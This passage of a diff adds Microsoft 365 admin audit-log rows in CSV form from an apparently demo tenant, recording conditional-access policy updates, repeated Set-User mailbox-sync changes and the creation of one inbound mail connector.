+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:08 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:06Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:09Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:08 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-19T01:58:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:08 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:08 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:07 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T01:58:06Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:06 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T05:13:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 5:13:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T03:04:33Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T03:07:46Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T04:36:33Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T04:43:13Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T04:43:14Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T18:15:15Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T18:15:15Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T17:48:50Z,,,New-InboundConnector,"[
+  {
+    ""Name"": ""Name"",
+    ""Value"": ""Githubrelay""
+  },
+  {
+    ""Name"": ""Enabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RestrictDomainsToCertificate"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SenderDomains"",
+    ""Value"": ""smtp:*;1""
+  },
+  {
+    ""Name"": ""SenderIPAddresses"",
+    ""Value"": ""13.90.41.248""
+  },
+  {
+    ""Name"": ""TlsSenderCertificateName"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""RestrictDomainsToIPAddresses"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ConnectorSource"",
+    ""Value"": ""AdminUI""
+  },
+  {
+    ""Name"": ""CloudServicesMailEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ConnectorType"",
+    ""Value"": ""OnPremises""
+  },
+  {
+    ""Name"": ""RequireTls"",
+    ""Value"": ""False""
+  }
+]"
+2020-05-18T17:24:28Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T14:51:53Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-18T15:04:23Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T15:02:53Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T23:13:42Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T23:37:04Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T21:59:40Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T21:59:40Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T21:47:21Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T15:57:55Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T15:57:55Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T15:48:07Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T15:45:21Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T17:13:16Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T17:36:39Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T04:01:36Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T04:01:35Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T03:49:42Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T05:14:25Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-18T05:22:49Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
